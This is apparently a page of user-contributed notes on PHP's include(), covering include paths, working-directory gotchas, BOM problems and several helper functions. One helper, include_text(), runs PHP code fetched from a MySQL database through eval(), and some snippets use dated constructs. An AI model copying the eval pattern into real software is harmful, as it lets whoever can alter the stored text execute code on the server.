set_include_path(implode(PATH_SEPARATOR, $paths));
}
}
?>
The __FILE__ macro will give the full path and name of an included script when called from inside the script. E.g.
<?php include("/different/root/script.php"); ?>
And this file contains:
<?php echo __FILE__; ?>
The output is:
/different/root/script.php
Surprisingly useful :> Obviously something like dirname(__FILE__) works just fine.
To avoid painfully SLOW INCLUDES under IIS be sure to set "output_buffering = on" in php.ini. File includes dropped from about 2 seconds to 0 seconds when this was set.
Since include() caused me many problems when I was trying to test my code, I wrote a small function. It receives as parameter the path to the file to include relative to the current file. The format is similar to:
"../../path/FileName.php"
The function returns the absolute path to the file to be included. This path can be used as argument to include() and resolves the problem of nested inclusions.
<?php
function getFilePath($relativePath){
$absPath=dirname($_SERVER['SCRIPT_FILENAME']);
$relativeArray=explode("/",$relativePath);
$absArray=explode("/",$absPath);
$upTokens=0;
//count the number of ".." tokens that precede the path
while(( $upTokens<count($relativeArray)) and ($relativeArray[$upTokens]=="..")) {
$upTokens++;
}
// create the absolute path
$filePath=$absArray[0];
for ($i=1; $i< (count($absArray)-$upTokens);$i++) {
$filePath.="/".$absArray[$i];
}
for ($i=$upTokens; $i< count($relativeArray);$i++){
$filePath.="/".$relativeArray[$i];
}
return $filePath;
}
?>
Hope you will find it useful....
Alex
Please note: when you include a (UTF-8) encoded file, this will be sufficient to send headers even if it doesn't contain any line breaks.
coldflame,
<?=$foo?> equals <? print $foo ?>
If 1 is not needed at the end, just use <? include($filename) ?> without the equal sign.
If a person directly accesses an include file by mistake, you may want to forward them to a correct default page.
Do this by:
Say the file to be included is 'newpubs.php'
and the main pages are either newpubs_e.php or newpubs_f.php
<?php
if($_SERVER['PHP_SELF']=="/newpubs.php") // array key quoted: a bare PHP_SELF is read as an undefined constant
{
header("Location: newpubs_e.php");
exit;
}
?>
Will send them to newpubs_e.php if they try to access newpubs.php directly.
AVOID ZERO BYTE ORDER MARK!
I was having problems with include/require (once or not). I created an include-opening.php which had the initial structure of the page, and then included this page in all other pages. The result was looking "crashed", so I did compare including or just pasting the html code into the page. The hardcoded version displayed ok, even with the source code being exactly the same.
So I opened the include file with notepad++ and set the encoding to UTF-8 (no BOM) and voila, everything is working great now.
When working with a well organized project you may come across multiple problems when including, if your files are properly stored in some nice folders structure such as:
- src
- web
- bo
- lib
- test
- whatever
as the include path's behaviour is somehow strange.
The workaround I use is having a file (ex: SiteCfg.class.php) where you set all the include paths for your project such as:
<?php
$BASE_PATH = dirname(__FILE__);
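// PATH_SEPARATOR is ";" on Windows and ":" on Unix/Linux
$DEPENDS_PATH = ".".PATH_SEPARATOR.$BASE_PATH;
$DEPENDS_PATH .= PATH_SEPARATOR.$BASE_PATH."/lib";
$DEPENDS_PATH .= PATH_SEPARATOR.$BASE_PATH."/test";
ini_set("include_path", ini_get("include_path").PATH_SEPARATOR.$DEPENDS_PATH);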
?>
Make all paths in this file relative to ITS path. Later on you can import any file within those folders from wherever with include/_once, require/_once without worrying about their path.
Just cross fingers you have permissions to change the server's include path.
I needed a way of include()ing a php page from a MySQL database. It took some work, but
eventually I came up with this:
<?php
function include_text($text){
while(substr_count($text, '<?php') > 0){ //loop while there's code in $text
list($html, $text) = explode('<?php', $text, 2); //split at first open php tag
echo $html; //echo text before tag
list($code, $text) = explode('?>', $text, 2); //split at closing tag
eval($code); //exec code (between tags)
}
echo $text; //echo whatever is left
}
?>
It doesn't work exactly the same as include(), as newlines after the '?>' tag are echoed, rather
than being discarded, but that's an exercise left to the reader to fix if they so desire, and
also globals defined within the included text are not available outside the function.
Not sure whether it would work with something like:
<?php if($x){ ?>
<p>Some HTML Output</p>
...
...
<?php }
else{ ?>
<p>Other HTML Output</p>
...
...
<?php } ?>
I rarely use that, but it's easy to re-write code to avoid it using HereDoc syntax, so the example above becomes:
<?php if($x){ echo <<<EOT
<p>Some HTML Output</p>
...
...
EOT;
}
else{ echo <<<EOT
<p>Other HTML Output</p>
...
...
EOT;
} ?>
Which would work with include_text()
It also won't work as-is with either asp-style or short tags.
"Files are included based on the file path given or, if none is given, the include_path specified. If the file isn't found in the include_path, include will finally check in the calling script's own directory and the current working directory before failing. "
I straced some PHP code; I think the first step is searching the current working directory, then the include path, and finally the calling script's own directory.
I just discovered a "gotcha" for the behavior of include when using the command line version of php.
I copied all the included files needed for a new version of a program into a temporary directory, so I could run them "off to the side" before they were ready for release into the live area. One of the files with a new version (call it common.inc.php for this example) normally lives in one of the directories in the include path. But I did not want to put the new version there yet! So I copied common.inc.php into my temporary directory along with the others, figuring that the interpreter would find it there before it found it in the include directory, because my include path has a . at the beginning. When I tested it, everything was fine.
But then I set up a cron job to run the script automatically every day. In the crontab I placed the full path of the script. But when it ran, it included the old version of my common.inc.php file out of the include directory. Interestingly, the other include files that only existed in the temporary directory were included fine.
Evidently AFTER the include path is searched, the directory in which the main script lives is searched as well. So my temporary installation almost worked fine, except that the lack of the small change I had made in the common file introduced a bug.
To make it work I use a shell script to start my php script. It contains a cd command into the temporary directory, then starts the php script.
So "current directory" (the . in the include path) for a command line script is really the current directory you are in when executing the script. Whereas it means the directory in which the script lives when executing under apache.
I hope this helps save someone else the hours it took me to figure out my problem!
David
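A check for the situation described in the note above, as an added example that is not part of the original notes: it asks PHP which copy of a file an include would pick and lists the other copies on the include path that it shadows. include_candidates() and report_shadowed_include() are hypothetical names, and the demo directories and files are constructed.

```php
<?php
// Added example; include_candidates() and report_shadowed_include() are hypothetical names.
function include_candidates(string $filename): array
{
    $found = [];
    foreach (explode(PATH_SEPARATOR, get_include_path()) as $dir) {
        if ($dir === '') {
            continue;
        }
        // A "." entry is resolved against the current working directory, which
        // for a cron or CLI run is wherever the script was started from.
        $full = realpath($dir . DIRECTORY_SEPARATOR . $filename);
        if ($full !== false && is_file($full) && !in_array($full, $found, true)) {
            $found[] = $full;
        }
    }
    return $found;
}

function report_shadowed_include(string $filename): array
{
    // stream_resolve_include_path() asks PHP itself which file it would pick.
    $resolved = stream_resolve_include_path($filename);
    $winner = $resolved === false ? null : realpath($resolved);
    $others = array_filter(
        include_candidates($filename),
        function ($path) use ($winner) { return $path !== $winner; }
    );
    return ['cwd' => getcwd(), 'resolved' => $winner, 'shadowed' => array_values($others)];
}

// Constructed demo: two directories that both hold a common.inc.php.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'incdemo_' . getmypid();
foreach (['live', 'staging'] as $d) {
    $dir = $base . DIRECTORY_SEPARATOR . $d;
    mkdir($dir, 0700, true);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'common.inc.php', "<?php return '$d';\n");
}
set_include_path($base . DIRECTORY_SEPARATOR . 'live' . PATH_SEPARATOR . $base . DIRECTORY_SEPARATOR . 'staging');
print_r(report_shadowed_include('common.inc.php'));
```

Running the same report from the cron environment and from an interactive shell shows whether the two runs resolve to different files.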
You can also use debug_backtrace to write a function that does the chdir automatically:
<?php
function include_relative($file)
{
$bt = debug_backtrace();
$old = getcwd();
chdir(dirname($bt[0]['file']));
include($file);
chdir($old);
}
?>
Though you can figure it out by reading the doc, this hint might save you some time. If you override include_path, be sure to include the current directory ( . ) in the path list, otherwise include("includes/a.php") will not search in the current script directory.
e.g :
<?php
if(file_exists("includes/a.php"))
include("includes/a.php")
?>
The first line will test to true, however include will not find the file, and you'll get a "failed to open stream" error.
Include and Require will call the __autoload function if the file that is being called extends some other class
Example Code:
File teste.php
<?php
class teste extends motherclass {
public function __construct() {
parent::__construct();
}
}
?>
File example.php
<?php
require("teste.php");
if (class_exists("motherclass"))
echo "It exists";
?>
You will be given the output:
It exists
I think the __autoload function should be called when I instantiate the teste class not when I include/require the file.